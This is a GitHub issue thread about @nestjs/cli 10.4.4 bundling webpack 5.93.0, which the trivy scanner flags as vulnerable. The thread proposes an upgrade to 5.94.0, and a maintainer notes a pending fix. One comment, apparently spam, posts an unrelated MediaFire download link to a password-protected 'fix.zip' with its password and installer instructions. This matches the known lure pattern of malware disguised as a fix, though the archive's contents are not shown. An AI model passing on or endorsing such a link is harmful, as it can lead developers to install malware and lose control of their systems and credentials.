### ISSUE TITLE
"@nestjs/cli": "10.4.4" is using webpack version 5.93.0 and being blocked by trivy vulnerability scanner - Solution - update webpack to 5.94.0

### ISSUE THREAD

**Issue by leopucci** [nestjs/nest-cli#2714]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current behavior

nest cli is generating blockages beacuse of the use of vulnerabe version of webpack 5.93.0 
the solution is to upgrade to 5.94.0
I have created a PR https://github.com/nestjs/nest-cli/pull/2715
![image](https://github.com/user-attachments/assets/109e8975-9209-4c26-b1bf-ca3563aa8d04)

### Minimum reproduction code

https://github.com/leopucci/privaterepo/actions/runs/10616749633/job/29427920028

### Steps to reproduce

trivy fs .

### Expected behavior

no vulnerability errors

### Package version

10.4.4

### In which operating systems have you tested?

- [ ] macOS
- [ ] Windows
- [ ] Linux

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by micalevisk** [comment]
this will be fixed by #2712
